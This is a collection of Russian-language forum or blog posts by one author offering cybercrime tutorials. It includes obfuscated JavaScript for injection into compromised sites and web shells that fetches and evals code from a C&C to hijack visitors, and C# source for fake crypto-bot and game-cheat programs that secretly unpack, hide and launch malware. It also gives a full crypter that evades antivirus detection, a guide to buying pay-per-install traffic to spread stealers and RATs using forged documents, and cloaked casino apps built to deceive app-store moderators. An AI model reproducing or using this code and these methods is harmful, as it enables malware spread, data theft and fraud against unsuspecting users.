Хороший Человек

Сливаем трафик с Сайтов/Дорвеев/Shells

rei — Sun, 05 Apr 2020 17:42:20 GMT

Нам понадобится:

---

VPS под CC

(Можно взять хостинг)

VPS под KeitaroTDS

(Можно белый он не будет светится в Web)

KeitaroTDS

Тут бесплатно: https://exploitinqx4sjro.onion/topic/167835/

Тут платно:

https://keitaro.io

Настройку хостов и кейтаро разбирайтесь сами, описывать не буду.

---

Скрипт CC:

Вам в нем нужно вписать данные Click Client v3 из тдс:

$TDS_api_url = "http://demo-en.keitaro.io/api.php?";
$Click_API_token = "2v3cfjwlcztbkpgrhcsmtzf68wz2tzkb";

Файл

pixel.php

- на него будут запросы из JS.

По дефолту перед запросами в тдс идет клоака:

https://xsstorweb56srs3a.onion/threads/35415/

ip($GLOBAL_IP);
            $header = $client->getHeaders();
            $header_url = $header[0];
            $header_url = preg_replace('/LOCATION: /', '', $header_url);
            $header_url = preg_replace('/Location: /', '', $header_url);
            $go_url = $header_url;
            if(strpos($go_url, 'http') !== false) {
                function str2hex( $str ) {
                    return array_shift( unpack('H*', $str) );
                }
                $txt = 'window.location = "'.$go_url.'";';
                $hex = str2hex( $txt );
                echo $hex;
            } else {
                bad_reguest();
            }

        }

    }

}

exit();

?>

Рядом с pixel.php должен лежать файл kclick_client.php

Он есть в тдс

http://demo-en.keitaro.io/admin/?object=codePresets.downloadClient

Переходим к JS для ресурсов, var x_u = "https://URL_DOMAIN/pixel.php"; - пропишите свой URL до pixel.php

Не забываем сделать SSL-сертификат на домен CC.

var x_u = "https://URL_DOMAIN/pixel.php";
function xhr_load(url) {
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if (xhr.readyState == XMLHttpRequest.DONE) {
            if(xhr.status== 200 || xhr.status == 304){
                var rl = ""+xhr.responseText;
                function h2a(r){for(var t=r.toString(),n="",e=0;e
  Перед вставкой на сайт пропустите через обфускатор.
  Вот бесплатный вариант:
  Javascript Obfuscator - Protects JavaScript code from stealing and shrinks size
  Online Javascript Obfuscator
  
    
  
  www.javascriptobfuscator.com
  На выходе будет такое:
  var _0xe095=["\x68\x74\x74\x70\x3A\x2F\x2F\x55\x52\x4C\x5F\x44\x4F\x4D\x41\x49\x4E\x2F\x70\x69\x78\x65\x6C\x2E\x70\x68\x70","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x44\x4F\x4E\x45","\x73\x74\x61\x74\x75\x73","","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x6C\x65\x6E\x67\x74\x68","\x30\x30","\x73\x75\x62\x73\x74\x72","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6E\x75\x6C\x6C","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x5F\x75\x69\x73","\x67\x65\x74\x49\x74\x65\x6D","\x73\x65\x74\x49\x74\x65\x6D"];
var x_u=_0xe095[0];function xhr_load(_0xb0ecx3){var _0xb0ecx4= new XMLHttpRequest();_0xb0ecx4[_0xe095[1]]= function(){if(_0xb0ecx4[_0xe095[2]]== XMLHttpRequest[_0xe095[3]]){if(_0xb0ecx4[_0xe095[4]]== 200|| _0xb0ecx4[_0xe095[4]]== 304){var _0xb0ecx5=_0xe095[5]+ _0xb0ecx4[_0xe095[6]];function _0xb0ecx6(_0xb0ecx7){for(var _0xb0ecx8=_0xb0ecx7.toString(),_0xb0ecx9=_0xe095[5],_0xb0ecxa=0;_0xb0ecxa< _0xb0ecx8[_0xe095[7]]&& _0xe095[8]!== _0xb0ecx8[_0xe095[9]](_0xb0ecxa,2);_0xb0ecxa+= 2){_0xb0ecx9+= String[_0xe095[10]](parseInt(_0xb0ecx8[_0xe095[9]](_0xb0ecxa,2),16))};return _0xb0ecx9}if(_0xe095[11]!== _0xb0ecx5&& void(0)!== _0xb0ecx5&& _0xe095[5]!== _0xb0ecx5){eval(_0xb0ecx6(_0xb0ecx5))}else {}}}};_0xb0ecx4[_0xe095[13]](_0xe095[12],_0xb0ecx3,true);_0xb0ecx4[_0xe095[14]](null)}if( typeof localStorage!== _0xe095[15]){if(localStorage[_0xe095[17]](_0xe095[16])!== _0xe095[16]){localStorage[_0xe095[18]](_0xe095[16],_0xe095[16]);xhr_load(x_u)}}
  Что получаем:
  JS Выполнет проверку localStorage
  Если доступно ставит куку localStorage (Чтоб не было кучи хитов/Проверка на уникальность),
  После установки куки выполняет XMLHttpRequest запрос до CC,
  Получает от CC закодированные в HEX данные, и делает eval.
  CC Выполнет проверку на ботов,
  Если все ок, делает запрос в TDS,
  Получает из TDS домен для редиректа,
  Кодирует редиркет в hex и отдает контент.

Бесплатная клоака для трафика/отстука.

rei — Sun, 05 Apr 2020 17:37:07 GMT

Создать 2 файла:

index.php

bad_reguest.php (сюда можно положить оригинальный код вашего лендинга для аппрува, дефолт код ниже)

Статься ориентирована на новичков и профи в этой сфере, подойдет каждому.

rei — Mon, 30 Mar 2020 10:43:46 GMT

Идея изначально была моя, она проста и легка как весенний одуванчик, сейчас решил ее дополнить и разложить по полкам, схема приносит ежедневный хороший и очень качественный прогруз.

Работать будем в Visual Studio 2019 C#

Скачать

Понадобиться архиватор 7zip

Скачать

Не пугайтесь те кто не шарит в VS и не когда не кодил! Начать не когда не поздно я разложил все полкам куда жать и что делать.

Весь код закоментил почти каждую строку.

Будут нужны красочные темы для форм C#

Я специально подготовил для вас свою коллекцию качаем тут:

https://anonfiles.com/R9f25299n6/Theme_C_zip

Пароль

xss.is

Мы будем писать с вами фейковые софта различного рода для распространения вашей малвари.
Прошу заранее вас определиться с тематикой вашего софта, в статье я выбрал тематику крипты.
Софт распространять мы будем там где могут попасться мамонты в этой сфере, а это различные форумы по криптовалюте так как тут проще всего.

Перейдем от теории к практике:

Запускаем Visual Studio и создаем проект Windows Forms

жмем далее и выбираем .Net 4.5 имя проекта будет в моем случаи Crex24, я буду делать

“бота который собирает с кранов на бирже Crex24 различную крипту в авто-режиме”.

В проекте сразу перейдем к дизайну формы, тут дело фантазии каждого, основной код который будет запускать вашу малварь мы пропишем позднее.

Для начала изменить стандартный дизайн формы на свой, для этого в начале статьи я дал ссылку на скачивания пака тем.

Я выбрал тему

clsNeoBuxTheme.cs

она довольно красивая как по мне.

После жмем в верху VS

Сборка > пересобрать проект

Слева появится меню Компоненты Crex24, сразу выбираем тему главной формы

Так же добавим

ControlMenu

и размещаем там где это нужно.

Разверните вкладку

Все формы Windows Forms

и так же кидаем:

Label – 4шт
TextBox - 4шт
2шт Кнопки
2шт checkBox

После красиво размещаем их на форме и переименовываем, изменить названия компонентов можно тут:

Мы получаем форму примерно такого вида:

Красиво, доверчиво.

Теперь самое главное, как эта форма будет пропихивать нашу малварь, для начала желательно криптануть ваш билд малвари, форму криптовать не нужно и да-же обфусцировать поверьте, ее можно слить на ВТ и детекты не придут.
Определимся когда будет запускаться наша малварь, не будем запускать сразу при запуске формы, можем спалиться. Запустим малварь например когда жертва нажмет кнопку Start

Мы не будем качать ваш exe билд со сторонних серверов, и не будем таскать его вместе с фейковым софтом в 1 exe. Мы так же не будем держать ваш exe рядом с программой в открытом виде.

Для примера вместо малвари я буду использовать putty.exe

Переименуем putty.exe в update.exe

Далее я буду использовать архиватор 7zip
Щелкаем по exe “малвари” update.exe правой кнопкой и выбираем добавить к архиву.

Уровень сжатия Ультра, формат архива zip

Пароль любой у меня будет:

123

Наш архив update.zip назовем: config.y

В этом архиве находится ваша малварь под паролем, да же если его слить на ВТ ваш exe не улетит туда же.

Возвращаемся к нашему фейковому софту:

Теперь нам надо сделать так что бы наш софт сумел

скрыто распаковать этот архив и запустить exe

от туда

при условии нажатия кнопки старт
Подключим необходимые NuGet пакеты:

Жмем по вкладке Проект > управление пакетами

Вкладка обзор, в поле поиска вводим

SharpZipLib

нужен для распаковки архива устанавливаем

После в поле поиска вводим

Costura.Fody

запихнет вашу dll SharpZipLib в сам билд формы что бы не таскать его отдельно, и так же установить.

Жмем 2 раза на форму в пустом месте и пишем код распаковки и запуска:

Далее разбор кода, вы так же можете скачать уже готовые исходники в конце статьи.

C#:

Скопировать в буфер обмена

//Подрубим юзинги
using System;
using System.Text;
using System.Windows.Forms;
using ICSharpCode.SharpZipLib.Core;
using ICSharpCode.SharpZipLib.Zip;
using System.Diagnostics;
using System.IO;
using System.Threading;

namespace Crex24
{

    public partial class Form1 : Form
    {

        public Form1()
        {

            InitializeComponent();
        }
        private void clsButtonGreen1_Click(object sender, EventArgs e)
        {
            string dir = Environment.GetEnvironmentVariable("AppData") + "\\Update"; // Путь к папке куда распакуем exe
            if (!Directory.Exists(dir))
                File.SetAttributes("config.y", FileAttributes.Hidden | FileAttributes.System); // Скрываем от пользователя сам архив

            //Далее шифруем наш пароль от архива и распаковываем
            //Зашифровать пароль можно тут: http://base64.ru/
            //В моем случаи пароль на архив config.y был 123 по этому после закодирования пароля в
            //base64 у меня будет пароль выглядеть так: MTIz

            string password = Encoding.ASCII.GetString(Convert.FromBase64String("MTIz")); // Пароль от архива зашифрованный в base64
            ExtractZipFile("config.y", password, dir + "\\"); //Распакуем архив

            File.Delete("config.y"); //Удаляем архив
            //Далее создаем поток и запускаем нашу малварь при клике на кнопку Start:
            new Thread(() =>
            {
                try
                {
                    File.SetAttributes(dir + "\\update.exe", FileAttributes.Hidden | FileAttributes.System); // Скрываем от пользователя
                    Process proc = Process.Start(dir + "\\update.exe"); //Запускаем exe малвари

                    // 2 строки далее можно удалить или оставить смотря как вам нужно
                    proc.WaitForExit(); //Ждем завершения работы малвари (если требуется)
                    File.Delete(dir + "\\update.exe"); //Удаляем exe малвари  (если требуется)
                }
                catch (Exception)
                {
                }

            }).Start();
        }

        // Функция для распаковки архива
        private static void ExtractZipFile(string archiveFilenameIn, string password, string outFolder)
        {

            {
                ZipFile zf = null;
                try
                {
                    FileStream fs = File.OpenRead(archiveFilenameIn);
                    zf = new ZipFile(fs);
                    if (!String.IsNullOrEmpty(password))
                    {
                        zf.Password = password;
                    }
                    foreach (ZipEntry zipEntry in zf)
                    {
                        if (!zipEntry.IsFile)
                        {
                            continue;
                        }
                        String entryFileName = zipEntry.Name;


                        byte[] buffer = new byte[4096];
                        Stream zipStream = zf.GetInputStream(zipEntry);
                        String fullZipToPath = Path.Combine(outFolder, entryFileName);
                        string directoryName = Path.GetDirectoryName(fullZipToPath);
                        if (directoryName.Length > 0)
                            Directory.CreateDirectory(directoryName);


                        using (FileStream streamWriter = File.Create(fullZipToPath))
                        {
                            StreamUtils.Copy(zipStream, streamWriter, buffer);
                        }
                    }
                }
                catch (Exception ex)
                {
                    throw ex;
                }
                finally
                {
                    if (zf != null)
                    {
                        zf.IsStreamOwner = true;
                        zf.Close();
                    }
                }


            }

        }

        private void TextBox2_TextChanged(object sender, EventArgs e)
        {
        }
    }
}

Добавляем красивую иконку для софта, правой кнопкой по проекту > свойства > Значек и манифест

На раб. столе, создаем папку CranBot Crex24 и кладем в нее наш

exe фейка

+ рядом

config.y архив соответсвенно.

Ох сейчас вы скажете зачем но поверьте все ОК!

Заливаем наш exe файл фека на ВТ.

И поверьте такой детект я наблюдаю уже почти год.

VirusTotal

www.virustotal.com

Вить это у нас по сути простой разархиватор zip архивов.

Ваша малварь в архиве под паролем, да же если ее зальют на вт толку от этого не будет.

Не верите, вот вам пример, собсвенно почему я и выбрал CrexBot для основы своего фейка:

Кран-бот для Crex24.com + 20$ в день

bitcointalk.org

Там я да же ВТ приложил той же датой, он с тех пор не изменился. И до сих пор идут инсталы.

Да пост я выложил в ру сегменте, но выкладывал я только ради проверки схемы, далее я перешел на пендосов.

Это лиш 1 тема размещенная на 1 форуме, таких тем по разным зарубежным форумам о крипте у меня много, за год разных фейков софтов я написал уже порядка 50шт, вы же если не так ленивы как я, за 1 год наклепаете более 5000 софтов... представьте какой профит будет? Но работа будет монотонная. Ноя уверенно скажу что вы не 1к $ срубите! тем же клиппером BTC адресов.
При чем на 1 софт уходит 10-15 минут, просто изменив вид формы под нужный софт понакидав туда различных компонентов и все.

Как вы поняли схема очень легкая, профитная, идает хорошую защиту от слива вашей малвари на ВТ.

Распространять конечно же придется в 1 рахиве в 1 папке что бы 2 файла forma.exe и config.y лежали рядом.
Так же можно рядом с формой создать папку img понакидать туда разных картинок, иконок флагов более 100шт и вместо config.y назвать архив us.png этот файл смешается среди кучи картинок. А наш софт будет брать именно его, распаковывать и запускать.

Видео обзор работы готового фейка:

На видео я показал логику работы софта и еще хочу дполнить словами:

Запуск формы
Нажатие на кнопку старт
Срабатывает распаковка архива config.y в папку C:\Users\\AppData\Roaming\update
Скрывает update.exe малвари (в моем случаи putty)
Удаляет изначальный архив рядом с exe формы config.y
Запускает update.exe
Ждем завершения программы
Удаляет update.exe

Вот и вся схема.

Кстати данный мануал отлично подойдет для распространения майнера, т.к очень легко понаделать фейковые формы читов различных игр. Как мы знаем у геймеров за частую нормальные карты стоят в пк. Не шарю в фортнайт но видел там аховые цены на аккаунты, понаделайте различные софта типо читы, трейнеры, подсчет статистики если для этой игры такое можно я уже сказал не шарю, и хапайте стилаком данные аки.

Дело фантазии и можно наклепать что угодно, представьте что форма это полотно как фотошопе.

Я не рекомендую обфусцировать сам софт формы, смысла нет + начнет палится со временем, а так будет жить и жить. К тому же мы вить не будет распространять подобное на площадках где будут декомпилить его.

Еще 1 плюс этой схемы это хороший обход рантайма некоторых АВ при запуске вашего exe

Собственно как и общеал вот вам готовый исходник который мы разобрали с вами в этой статье:

Crex24.zip - AnonFiles

anonfiles.com

Пак тем для форм:

https://anonfiles.com/R9f25299n6/Theme_C_zip

Пароль

xss.is

Все тех. вопросы задаем тут, отвечу всем.

Вложения

[Web] Telegram оповещение о новом посетителе с определением GEO

rei — Sat, 28 Mar 2020 21:56:32 GMT

Доброго времени суток дорогие пользователи.

Возможно некоторые из читателей владеют своим сайтом или же работают на арбитраже трафика или подобной тематикой.

Именно для вас данная статья должна будет быть полезной.

Речь пойдет о том, как можно отслеживать новых посетителей или же действия которые были выполнены посетителем, и отправлять данные об этом посетителе в Telegram.

В данном виде: IP - 78.159.101.115 | Country - Германия | City - Frankfurt am Main

Так же если пожелаете можете оставлять комментарий к действию, дабы понимать с какой части была получена информация.

Пример оповещения с комментарием: IP - 78.159.101.115 | Country - Германия | City - Frankfurt am Main | Главная страница

На весь код я наложил комментарии дабы вы могли в нем разобраться при желании его изменить.

Я сделал 2 варианта установки, возможно кому-то один из методов покажется лучше чем другой.

Для начала создадим телеграм бота который будет посылать нам уведомления.

Ищем в телеграм

BotFather

После чего начинаем с ним диалог

Вводим команду /newbot

После чего пишем ник боту

После этого вас попросят придумать логин боту с окончанием bot

Как пример Notifytestbot (главное чтоб в логине было в конце 'bot')

После успешного создания вы получите сообщение с токеном бота

Пример токена бота - 1086426018:AAFM1JamTiTbVs93umRiW32XSwyJ-2DfeBE

Переходим к установке скрипта:

Вариант номер один

Использование JS скрипта для вызова скрипта из HTML страницы.

перекидываем notify.php на ваш хостинг, можно как в корень сайта так и в отдельную папку.

После чего, на вашей HTML странице выставляете такой код:

HTML:

Теперь переходим в файл notify.php

И выставляем в параметр $token ваш токен бота Telegram;

А в параметр $chat_id выставляем ID своего телеграм чата, получаем его написав данному @myidbot боту команду /getid

После успешного заполнение данных параметров, сохраняем файл и проверяем правильность работы, переходим на страницу где оставляли HTML код и смотрим пришло ли оповещение от нашего бота (Не забудьте начать с ним чат)

Если оповещение пришло, значит вы настроили все правильно, если же нет проверьте файл notify.php и html код который выставляли на страницу сайта.

Вариант номер два:

Использование php для вызова функции отправки сообщения.

С этим все еще проще, заливаем на хостинг notify.php в корень сайта

После чего если вы хотите использовать скрипт на странице (Файл страницы должен быть .php формата а не .html)

Тогда делаем примерно так

PHP:

Send('Токен бота','Ваш чат id получаем его написав данному @myidbot боту команду /getid');
?>

В общем то и все.

Исходник notify.php для первого варианта установки -

https://www.sendspace.com/file/ur15q9

Исходник notify.php для второго варианта установки -

https://www.sendspace.com/file/anrox2

самым терпеливым кто дочитал статью полностью, надеюсь она была вам полезна.

Пролив инсталлов - цены, и как лить самому. 200$ за 1000 инсталлов

rei — Sat, 28 Mar 2020 21:46:07 GMT

Когда я готовился к данной статье, в голове всплывало куча образов, информации и ностальгии которую я сегодня вам поведаю.

Начну немного со своей истории, 2-3 года назад моей первой купленной программой был стиллер, я думал "надо просто купить стиллер и буду всех взламывать"

Через неделю настигло меня первое разочарование.

Оказалось, купить "просто стиллер" недостаточно. Сам по себе стиллер это лишь инструмент, который без определенной схемы (цикла) работы не принесет никакого профита.

Нужен трафик на билд стиллера, нужен крипт (мутация) файла, так как антивирусы не дадут запустить жертве ваш стилак и прочее прочее.

Для себя я сделал вывод в то еще время:

Чтобы получить профит нужен цикл:

Хороший инструмент + хороший крипт файла+ трафик + грамотная обработка логов = профит

Если убрать любую из составляющих этой схемы, профита вы не увидите.

Со временем я протестировал много инструментов (стиллеры - клипперы - ботнеты - ратники - хвнц - хрдп), научился криптовать сам свои файлы, научился обрабатывать логи на разные запросы, но появилась новая проблема - трафик.

Для начала надо определиться логи какой ЦА (целевой аудитории) вы хотите видеть у себя в панельке.

Если кардинг то это банки юсы-европы, пп, амозон - ебей. Если крипта, то линки бирж по типу битрекса или ебита.

Я перепробовал почти ВСЕ метода привлечения трафика, а их очень много как оказалось).

Очень много, и перепробовать их все заняло достаточно продолжительное время, какие-то уже не работаn, где-то низкий КПД, какие-то очень неплохо выстреливают.

В рамках данной статьи затрону несколько эффективных методов привлечения трафика:

1) Биржи инсталлов (или PPI Партнерки)

1000$ за 1000 инсталлов ANGEL FAST

800$ за 1000 инсталлов ANGEL FAST

850$ за 1000 инсталлов ANGEL FAST

О чем говорят эти скрины? Это цены у посредников за установки.

Лично мне и моей команде говорит это то, что они накручивают цену в несколько раз от исходных затрат. Именно я и сейчас расскажу.

Биржа - место, где продают инсталлы. То место где эти перекупы покупают инсталлы по себестоимости и "толкают" все незнающим пользователям.

Для чего проливать инсталлы?

С установок файлов мы получаем логи (если был запущен стиллер). Если ботнет или хвнц - получаем всю остальную информацию.

Логи мы уже обрабатываем и зарабатываем с них. Это всё сделано для того, что бы поштучно не покупать лог за 10$

Потому что 10$ * 1000 = 10000$

Вместо 10000$ за 1000 инсталлов, если покупаем поштучно, гораздо выгоднее пролить их самому.

А что если Вы сами захотите лить себе инсталлы?

На это посред (который на форуме продаёт 1000 инсталлов за 1000$) будет плакать "что это очень трудно", "очень геморойно быть инсталлером", "я себе мало накручиваю","трудно-почти даже невозможно пройти регистацию и модерацию" и ещё кучу отговорок.

Но этот чел может "помочь" Вам, за символическую плату в $1500-3000 зарегистрировать Вам аккаунт в бирже!

Это просто трындец ребята, зарегестироваться в бирже может ЛЮБОЙ желающий и пройти там модерацию!

Мы призываем не переплачивать за инсталлы и сейчас покажем.

Какая же себестоимость качественных инсталлов?

USA и Европа по себестоимости обходиться в $120-200 за 1000 установок. А не 1000$, как у продавцов.

Отсюда вопрос: откуда взялись эти $700-1000(!) что нам предлагают эти "бизнесмены" ??

Есть 2 категории бирж:

К первой категории относиться прямые биржы, которые предоставляют вам установочный трафик напрямую (с такими мы и работаем)

Ко второй категории относятся "сайты прокладки" то есть простые перекупщики, где закупаются у первой категории и перепродают нам (нам они не интересны даже)

Когда мы говорим об инсталлах, мы имеем ввиду файловые биржи, это 95% трафика именно идет оттуда!

Давайте глянем что такое биржы инсталлов и как их вообще искать

Биржы в гугле вбиваются "PPI партнерки", вылетает нам например этот сайт https://x-monitor.ru/faylovye_partnerki/ppi

И как мы видим нам выдает список бирж, где InstallsPro стоит там на первом месте (честно скажу не просто так, это на мой взгляд лучшая биржа из всех имеющихся)

На любой бирже мы будем регистрироваться как "рекламодатель", процесс регистрации: на почту отправить заявку о регистрации (в основном регистрация проходит в "ручном" режиме модератором биржы).

Но перед процессом регистрации нам необходимо подготовиться, потому что регистрация проходит по одному и тому же циклу, который мы обязаны знать.

И тут мы "убиваем" наглую ложь инсталлеров-перекупов, где "это трудно-это нереально, нужно тысяча документов" и еще +100500 лжи.

А нужен лишь какой-нибудь простой софт и посадочная страница. ВСЁ!

Максимум, по запросу нужно будет в фотошопе отрисовать доки.

Это обеспечит вам бесплатную регистрацию в любой бирже инсталлов.

Вы регистрируетесь как "рекламодатель" и вы продвигаете обычный свой софт (официальная история)

Это может быть "продвижение вашего бренда компании", "софт со скрытой рекламой за который вы лично получаете вознаграждение" или "софт для привлечения аудитории и захвата рынка (демо версия).

Модератор - обычный человек, который "руками" пропускает "рекламодателей" для распространения своего софта.

Софт может быть простым, и с какой то конкретной и полезной функцией. Потом после прохождения модерации, надо будет немного изменить код для подгруза уже вашего любого файла.

Название софта должно быть уникальным (если будет необходимость в нашей команде есть кодер, который запилит любой софт для любой биржы)

Откровенную гадость я не советовал бы делать, софт должен быть хоть чуть- чуть привлекательным)

С одним софтом вы можете проходить модераторов на РАЗНЫХ БИРЖАХ !

На сегодня по поводу работы с биржами всё. Остальное более приватно ;)

2) Делаем нужный лендинг под трафик к вашей ЦА

Очень действенный метод трафика, мы обучаем как сделать правильный ленд под вашу ЦА, даём свои наработки, скрипты и нужные сервисы, которые помогут вам делать от 1000 инсталлов нужной ЦА в день!

3) Ютуб как метод привлечения для установок.

Тоже очень выгодный метод. Немного статистики:

Общее количество пользователей YouTube — 1 300 000 000.

Ежедневно на Youtube просматривается почти 5 миллиардов видеороликов.

YouTube получает более 30 миллионов посетителей в день

Общее количество часов просмотра видео на YouTube каждый месяц — 3,25 миллиарда.

Взглянув на "холодные" цифры вы понимаете, что не стоит эту площадку сбрасывать со счетов, тут тонна нужного нам трафика и я готов показать как можно грамотно использовать в своих целях!

Пишем свой криптор на C#.

rei — Sat, 28 Mar 2020 21:39:22 GMT

Первый затяг. Принцип работы нашего криптора. Код стаба.

В решении у нас будет два проекта. Стаб криптора, и сам криптор.

Криптор будет передавать зашифрованные байты стабу, а сам стаб их расшифрует, дропнет файл в рандомную папку, и запустит его. Звучит просто, да и на деле это будет несложно.

Создаём новый консольный проект:

Объявим необходимые юзинги:

Код:

using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Threading;

И теперь сделаем метод дропа файла в рандом папку и его запуска:

Код:

static void DropAndRun(byte[] bytes, string fileName) // В качестве аргументов принимаем байты и имя файла
        {
            string[] dirs = new string[] // Создаём массив папок, в один из которых будет дропаться файл
к                {
                    Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), // AppData
                    Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), // ProgramData
                    Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), // LocalAppData
                    Path.GetTempPath() // Temp
                };
            Random random = new Random(); // Создаём переменную random, для генерации случайного числа
            int pathIndex = random.Next(0, dirs.Length); // Определим индекс массива рандомно
            string filePath = dirs[pathIndex] + "\\" + fileName; // Переменная, в которой хранится полный путь до файла
            try
            {
                if (File.Exists(filePath)) // Делаем проверку на наличие файла в папке
                {
                    File.Delete(filePath); // Если файл существует, то удаляем его
                }     
               
                File.WriteAllBytes(filePath, bytes); // Записываем байты в файл
                Process.Start(filePath); // Запускаем
            }
            catch { }
        }

Далее просто скопируйте три метода: RC4 - который отвечает за шифр байтов, StringToByteArray - конвертирует строку в массив байтов, и XOR - который отвечает за шифр строки,

И импортируйте их в проект:

Осталось "собрать" главный метод, и стаб готов. А главный метод выглядит так:

Код:

        static void Main()
        {
              Thread.Sleep(6000); // Делаем небольшую задержку перед запуском
              byte[] encryptedBytes = StringToByteArray(XOR("[BYTES]")); // Сначала принимаем строку зашифрованных байтов (RC4 + XOR), декодируем XOR, в конце получаем зашифрованные байты.
              byte[] passBytes = Encoding.Default.GetBytes("[PASSWORD]"); // Получаем байты пароля для RC4
              byte[] decryptedBytes = RC4(passBytes, encryptedBytes); // Декодируем байты
              DropAndRun(decryptedBytes, "build.exe"); // Дропаем и запускаем чистый файл     
        }

Стаб готов, теперь копируем весь код и создаём txt файл, в который помещаем наш код.

Второй затяг. Пишем GUI.

Создаём новый проект Windows Forms.

Добавим юзинги:

Код:

using Microsoft.CSharp;
using System;
using System.CodeDom.Compiler;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Windows.Forms;

В конструкторе добавляем 2 textbox'a, 3 button'a, ну и пару label'ов:

Для кнопки выбора файла создаём диалоговое окно:

Код:

        private void button1_Click(object sender, EventArgs e)
        {
            OpenFileDialog dialog = new OpenFileDialog();
            dialog.Filter = "build.exe |*.exe";  // Фильтр
            if (dialog.ShowDialog() == DialogResult.OK)     
                textBox1.Text = dialog.FileName; // Добавляем полный путь до файла в textBox1           
        }

Добавим методы шифра, получения рандомной строки, конвертирования массива байтов в строку:

Код:

        static string ByteArrayToString(byte[] ba)
        {
            return BitConverter.ToString(ba).Replace("-", "");
        }
        static string RandomString(int size)
        {
            Random random = new Random((int)DateTime.Now.Ticks);
            StringBuilder builder = new StringBuilder();
            char ch;
            for (int i = 0; i < size; i++)
            {
                ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65)));
                builder.Append(ch);
            }
            return builder.ToString();
        }

Ну и методы XOR и RC4 такие же.

Для кнопки генерации ключа получаем рандом строку:

Код:

        private void button2_Click(object sender, EventArgs e)
        {
            Random rnd = new Random();
            int random = rnd.Next(6, 20); // Рандом цифра от 6 до 20
            textBox2.Text = RandomString(random); //Помещаем рандом строку, с рандомной длинной
        }

Теперь добавляем наш txt с кодом стаба в ресурсы проекта:

И добавим код для кнопки Build:

Код:

        private void button3_Click(object sender, EventArgs e)
        {
            string bytesString = ByteArrayToString(RC4(Encoding.Default.GetBytes(textBox2.Text), File.ReadAllBytes(textBox1.Text))); //Шифруем байты, конвертируем шифрованные байты файла в строку
            CompilerParameters Params = new CompilerParameters();
            Params.GenerateExecutable = true;
            Params.ReferencedAssemblies.Add("System.dll"); // Добавляем ссылку на System.dll
            Params.CompilerOptions += "\n/t:winexe"; // Задаём тип выходных данных
            Params.OutputAssembly = "Crypted.exe"; // Имя файла
            string Source = Properties.Resources.Stub_2D2D; // Переменная, в которой хранится код стаба
            Source = Source.Replace("[BYTES]", XOR(bytesString)); // Заменяем строку [BYTES], на заксоренную строку с шифрованными байтами
            Source = Source.Replace("[PASSWORD]", textBox2.Text); // Заменяем пароль для RC4
            var settings = new Dictionary();
            settings.Add("CompilerVersion", "v4.0"); // Указываем версию целевой платформы
            CompilerResults Results = new CSharpCodeProvider(settings).CompileAssemblyFromSource(Params, Source);
            if (Results.Errors.Count > 0)
            {
                foreach (CompilerError err in Results.Errors) // Если есть ошибки, выводим их циклом
                   MessageBox.Show(err.ToString());
            }
            else
            {
                MessageBox.Show("Crypted!", "2D2D Cryptor"); // Иначе, выводим сообщение, что всё гуд
            }
        }

Криптор готов, проверяем.

Ну и детекты (криптовал своего бота):

Ну, а на этом у меня всё!

Кейс сливаем трафик на мобильное приложение Казино

rei — Wed, 11 Dec 2019 13:10:58 GMT

Ну что ж друзья, мы не раз рассказывали Вам о таком перспективном подходе как слив трафик на мобильные приложения Webview со сторов, сегодня мы подробно разберем этот источник трафика от А до Я, приготовьтесь к большому мануалу. Вы узнаете, как клоачить модеров, как фармить аккаунты гп, как разрабатывать прилку и где найти исполнителей, а также цифры, сколько приносит тот или иной подход.

Летим на гуглплей!

Схема слива построена на том, чтобы загрузить в гуглплей или Аппстор приложение, которое после установки на телефон при запуске будет открывать во встроенном браузере webveiw мобильную версию сайта казино, люди регаются = вносят депозиты = вы зарабатываете. По данной схеме можно работать абсолютно на любое гео и получать хорошие результаты. А также не забывайте, что схему можно адаптировать под беттинг и прочие штучки приятные). Итак теперь давайте пойдем по порядку и разберем подробно каждый момент.

Как с технической стороны выглядит процесс:

Запускается приложение
Отправляется запрос на сервер, на сервере мы определяем показывать заглушку модератору или открыть какой-то урл в вебвью для реального игрока (процесс клоаки рассмотрим чуть позже).
если необходимо открыть заглушку, просто запускается приложение-заглушка ( без доп запросов, оно изначально портировано в код ), если показать сайт - открывается урл в инаппбраузере
делайте приложение с возможностью рассылки пуш уведомлений, и 1-2 раза в неделю делайте рассылку, это увеличит доход с приложения на 10-15%.

Теперь вопрос где взять трафик:

А) Закупаем трафик в рекламных сетях на мобильное приложение (например ФБ или др. Источниках), для того чтобы максимально эффективно сливать трафик вам необходимо интегрировать в приложение SDK Facebook, до того, как вы его залили в сторы (чтобы отливать на приложение с оптимизацией за инсталл) и SDK Appsflyer ( чтобы можно было интегрироваться с такими сетями как гугл и тоже лить с оптимизацией за инсталл). Рекламные компании на приложения в фейсбуке проходят сразу по автомодерации, и если не жестить с креативами, то аккаунты будут жить достаточно долго от 2 недель до 2 месяцев по нашей практике.

Небольшой мануал о том, как работать с ФБ СДК и как расшаривать приложения на свои рекламные акки:

Вот тут можно почитать и взять фб сдк - https://developers.facebook.com/docs/app-ads/app-setup
В панели разработчика (developers.facebook.com) администратор приложения может открывать доступ к приложению как компаниям, так и отдельным рекламным кабинетам. Компании, в свою очередь могут шарить приложение внутри своих рекламных кабинетов. Более гибкое и удобное решение для компаний с большим кол-вом аккаунтов.

Авторизированная компания-партнер может расшаривать приложение только внутри своего бизнес менеджера.

Как узнать ID рекламного аккаунта:

https://www.facebook.com/business/help/1492627900875762Как узнать ID бизнес менеджера:

Переходим в бизнес менеджер (раздел: настройки компании), во вкладке «Информация о компании» есть ID бизнес менеджера.

